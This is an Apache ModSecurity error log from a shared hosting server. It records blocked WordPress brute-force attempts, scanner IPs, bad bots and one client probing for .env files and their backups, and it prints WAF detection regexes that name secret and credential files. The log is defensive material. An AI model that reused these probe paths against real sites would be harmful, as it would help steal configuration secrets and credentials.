[Tue May 26 17:30:08.434042 2026] [security2:error] [pid 894579:tid 894637] [remote 54.38.29.86:59586] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 86.29.38.54.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "crustiesplacebakery.com.thedebateafrica.org"] [uri "/wp-login.php"] [unique_id "ahWLSAEtZWuWWBGzl__D-gABTTk"]
[Tue May 26 17:30:08.614911 2026] [security2:error] [pid 894579:tid 894793] [client 107.175.151.122:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLSAEtZWuWWBGzl__EAQAAAVw"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1466854&
[Tue May 26 17:30:09.652197 2026] [security2:error] [pid 891273:tid 891516] [client 87.106.152.203:59028] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ucdc.co.in"] [uri "/images/images/cache.php"] [unique_id "ahWLScDEzZ8z3jtDm82dfAAAAHE"], referer: www.google.com
[Tue May 26 17:30:09.902572 2026] [security2:error] [pid 894579:tid 894781] [client 179.64.21.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLSQEtZWuWWBGzl__EEwAAAVA"]
[Tue May 26 17:30:10.921811 2026] [security2:error] [pid 894579:tid 894636] [remote 103.11.102.106:47154] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 106.102.11.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahWLSgEtZWuWWBGzl__EOAABYDg"]
[Tue May 26 17:30:11.068422 2026] [security2:error] [pid 894579:tid 894746] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLSgEtZWuWWBGzl__EMQAAAS4"]
[Tue May 26 17:30:12.511335 2026] [security2:error] [pid 894579:tid 894793] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLTAEtZWuWWBGzl__EeQAAAVw"]
[Tue May 26 17:30:12.594602 2026] [proxy:error] [pid 891273:tid 891279] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:30:12.594652 2026] [proxy_http:error] [pid 891273:tid 891279] [remote 35.94.96.83:58602] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:30:12.595252 2026] [proxy:error] [pid 891273:tid 891279] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:30:12.595287 2026] [proxy_http:error] [pid 891273:tid 891279] [remote 35.94.96.83:58602] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:30:12.686372 2026] [proxy:error] [pid 891273:tid 891391] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:30:12.686423 2026] [proxy_http:error] [pid 891273:tid 891391] [remote 35.94.96.83:58602] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:30:12.687108 2026] [proxy:error] [pid 891273:tid 891391] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:30:12.687163 2026] [proxy_http:error] [pid 891273:tid 891391] [remote 35.94.96.83:58602] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:30:13.070740 2026] [security2:error] [pid 894579:tid 894750] [client 203.194.101.7:49640] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLTAEtZWuWWBGzl__EiwAAATI"]
[Tue May 26 17:30:13.070889 2026] [security2:error] [pid 894579:tid 894750] [client 203.194.101.7:49640] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLTAEtZWuWWBGzl__EiwAAATI"]
[Tue May 26 17:30:15.167541 2026] [security2:error] [pid 894579:tid 894823] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLTgEtZWuWWBGzl__EwgAAAXo"]
[Tue May 26 17:30:16.869442 2026] [security2:error] [pid 894579:tid 894662] [remote 154.66.198.148:5160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.198.66.154.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWLUAEtZWuWWBGzl__E9gABXlI"]
[Tue May 26 17:30:17.379785 2026] [security2:error] [pid 894579:tid 894793] [client 223.235.98.214:11420] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLUQEtZWuWWBGzl__FDAAAAVw"]
[Tue May 26 17:30:17.379994 2026] [security2:error] [pid 894579:tid 894793] [client 223.235.98.214:11420] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLUQEtZWuWWBGzl__FDAAAAVw"]
[Tue May 26 17:30:17.560839 2026] [security2:error] [pid 894579:tid 894728] [client 57.141.2.24:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLUQEtZWuWWBGzl__FAAAAARw"]
[Tue May 26 17:30:18.533382 2026] [security2:error] [pid 894579:tid 894815] [client 183.171.191.201:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahWLUgEtZWuWWBGzl__FHQAAAXI"]
[Tue May 26 17:30:19.876490 2026] [security2:error] [pid 894579:tid 894672] [remote 5.78.119.122:46008] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.119.78.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLUwEtZWuWWBGzl__FUQABH1w"]
[Tue May 26 17:30:20.018024 2026] [security2:error] [pid 894579:tid 894720] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLUwEtZWuWWBGzl__FSwAAARQ"]
[Tue May 26 17:30:20.453228 2026] [security2:error] [pid 894579:tid 894734] [client 74.7.175.187:43772] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.stvica.jhonweb.com"] [uri "/cgi-sys/404.html"] [unique_id "ahWLVAEtZWuWWBGzl__FbAABIl4"]
[Tue May 26 17:30:21.286221 2026] [security2:error] [pid 891273:tid 891452] [client 85.208.96.210:63982] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWLVcDEzZ8z3jtDm82e0gAAADE"]
[Tue May 26 17:30:21.286401 2026] [security2:error] [pid 891273:tid 891452] [client 85.208.96.210:63982] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWLVcDEzZ8z3jtDm82e0gAAADE"]
[Tue May 26 17:30:21.856826 2026] [security2:error] [pid 891273:tid 891423] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLVcDEzZ8z3jtDm82e3QAAABQ"]
[Tue May 26 17:30:21.975118 2026] [security2:error] [pid 894579:tid 894641] [remote 211.23.68.235:16183] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLVQEtZWuWWBGzl__FmAABPz0"]
[Tue May 26 17:30:23.029454 2026] [security2:error] [pid 891273:tid 891302] [remote 46.62.185.67:49492] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "canopykaapi.com"] [uri "/wp-login.php"] [unique_id "ahWLVsDEzZ8z3jtDm82fKQAAGxw"]
[Tue May 26 17:30:23.252348 2026] [security2:error] [pid 894579:tid 894829] [client 203.194.101.7:49975] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLVwEtZWuWWBGzl__FswAAAYA"]
[Tue May 26 17:30:23.252497 2026] [security2:error] [pid 894579:tid 894829] [client 203.194.101.7:49975] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWLVwEtZWuWWBGzl__FswAAAYA"]
[Tue May 26 17:30:23.263439 2026] [security2:error] [pid 891273:tid 891311] [remote 74.7.241.58:41938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWLV8DEzZ8z3jtDm82fNAAADiU"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/www/afstpaul.org/wp-content/plugins/woocommerce/templates/order
[Tue May 26 17:30:23.617869 2026] [security2:error] [pid 894579:tid 894682] [remote 46.62.185.67:57948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 67.185.62.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "christinaspromotions.com"] [uri "/wp-login.php"] [unique_id "ahWLVwEtZWuWWBGzl__FvwABGWY"]
[Tue May 26 17:30:24.084517 2026] [security2:error] [pid 894579:tid 894832] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLVwEtZWuWWBGzl__FwQAAAYM"]
[Tue May 26 17:30:26.430341 2026] [security2:error] [pid 891273:tid 891468] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLWsDEzZ8z3jtDm82fgAAAAEE"]
[Tue May 26 17:30:27.188081 2026] [security2:error] [pid 891273:tid 891371] [remote 69.49.112.72:4960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.112.49.69.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLWsDEzZ8z3jtDm82fnwAAfmE"]
[Tue May 26 17:30:27.779568 2026] [security2:error] [pid 894579:tid 894755] [client 87.106.152.203:61667] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.152.106.87.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.ucdc.co.in"] [uri "/images/images/cache.php"] [unique_id "ahWLWwEtZWuWWBGzl__GPQAAATc"], referer: www.google.com
[Tue May 26 17:30:28.511718 2026] [security2:error] [pid 894579:tid 894749] [client 223.235.98.214:4135] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLXAEtZWuWWBGzl__GUgAAATE"]
[Tue May 26 17:30:28.511881 2026] [security2:error] [pid 894579:tid 894749] [client 223.235.98.214:4135] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLXAEtZWuWWBGzl__GUgAAATE"]
[Tue May 26 17:30:29.307359 2026] [security2:error] [pid 894579:tid 894750] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLXAEtZWuWWBGzl__GWwAAATI"]
[Tue May 26 17:30:31.503510 2026] [security2:error] [pid 894579:tid 894754] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLXwEtZWuWWBGzl__GqQAAATY"]
[Tue May 26 17:30:32.103863 2026] [security2:error] [pid 894579:tid 894753] [client 68.234.41.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLYAEtZWuWWBGzl__GvwAAATU"], referer: https://www.anujtradingco.com/
[Tue May 26 17:30:33.631387 2026] [security2:error] [pid 891273:tid 891441] [client 68.234.41.176:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWLYcDEzZ8z3jtDm82ggwAAACY"], referer: https://www.anujtradingco.com/pages/services-modern/?unapproved=1229529&moderation-hash=a12bdda845346650d9dce556bea12ae1
[Tue May 26 17:30:34.055158 2026] [security2:error] [pid 894579:tid 894794] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLYQEtZWuWWBGzl__G5wAAAV0"]
[Tue May 26 17:30:34.818646 2026] [security2:error] [pid 894579:tid 894821] [client 142.248.80.47:19392] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env"] [unique_id "ahWLYgEtZWuWWBGzl__G-wAAAXg"]
[Tue May 26 17:30:34.862789 2026] [security2:error] [pid 894579:tid 894786] [client 142.248.80.47:31486] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/backend/.env"] [unique_id "ahWLYgEtZWuWWBGzl__HBQAAAVU"]
[Tue May 26 17:30:34.864731 2026] [security2:error] [pid 894579:tid 894838] [client 142.248.80.47:31466] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/app/.env"] [unique_id "ahWLYgEtZWuWWBGzl__HBgAAAYk"]
[Tue May 26 17:30:34.865759 2026] [security2:error] [pid 894579:tid 894787] [client 142.248.80.47:31472] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/api/.env"] [unique_id "ahWLYgEtZWuWWBGzl__HBwAAAVY"]
[Tue May 26 17:30:36.312151 2026] [security2:error] [pid 894579:tid 894772] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLYwEtZWuWWBGzl__HJwAAAUc"]
[Tue May 26 17:30:37.191266 2026] [proxy:error] [pid 891273:tid 891345] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:30:37.191328 2026] [proxy_http:error] [pid 891273:tid 891345] [remote 198.235.24.19:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:30:37.191915 2026] [proxy:error] [pid 891273:tid 891345] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:30:37.191964 2026] [proxy_http:error] [pid 891273:tid 891345] [remote 198.235.24.19:0] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:30:37.903131 2026] [security2:error] [pid 891273:tid 891350] [remote 195.250.23.247:51434] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 247.23.250.195.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWLZcDEzZ8z3jtDm82gugAANEw"]
[Tue May 26 17:30:38.438223 2026] [security2:error] [pid 894579:tid 894585] [remote 211.23.68.235:56106] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonparra.com"] [uri "/wp-login.php"] [unique_id "ahWLZgEtZWuWWBGzl__HSwABWQU"]
[Tue May 26 17:30:38.574899 2026] [security2:error] [pid 894579:tid 894758] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLZgEtZWuWWBGzl__HSAAAATo"]
[Tue May 26 17:30:39.012057 2026] [security2:error] [pid 894579:tid 894586] [remote 109.205.180.55:44058] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWLZgEtZWuWWBGzl__HUwABZQY"]
[Tue May 26 17:30:39.228807 2026] [security2:error] [pid 894579:tid 894767] [client 223.235.98.214:26877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLZwEtZWuWWBGzl__HXgAAAUM"]
[Tue May 26 17:30:39.228929 2026] [security2:error] [pid 894579:tid 894767] [client 223.235.98.214:26877] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWLZwEtZWuWWBGzl__HXgAAAUM"]
[Tue May 26 17:30:39.571755 2026] [security2:error] [pid 894579:tid 894736] [client 142.248.80.47:31472] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.production.copy"] [unique_id "ahWLZwEtZWuWWBGzl__HZAAAASQ"]
[Tue May 26 17:30:40.865008 2026] [security2:error] [pid 894579:tid 894814] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLaAEtZWuWWBGzl__HdAAAAXE"]
[Tue May 26 17:30:41.080094 2026] [security2:error] [pid 894579:tid 894806] [client 49.36.183.202:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWLaAEtZWuWWBGzl__HeAAAAWk"]
[Tue May 26 17:30:41.155914 2026] [security2:error] [pid 891273:tid 891418] [client 142.248.80.47:31862] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.production~"] [unique_id "ahWLacDEzZ8z3jtDm82g5AAAAA8"]
[Tue May 26 17:30:41.155914 2026] [security2:error] [pid 894579:tid 894786] [client 142.248.80.47:31874] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.production.swp"] [unique_id "ahWLaQEtZWuWWBGzl__HfwAAAVU"]
[Tue May 26 17:30:41.156325 2026] [security2:error] [pid 894579:tid 894755] [client 142.248.80.47:31850] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpanel.plenitudotonal.com"] [uri "/___proxy_subdomain_cpanel/.env.production.backup"] [unique_id "ahWLaQEtZWuWWBGzl__HgAAAATc"]
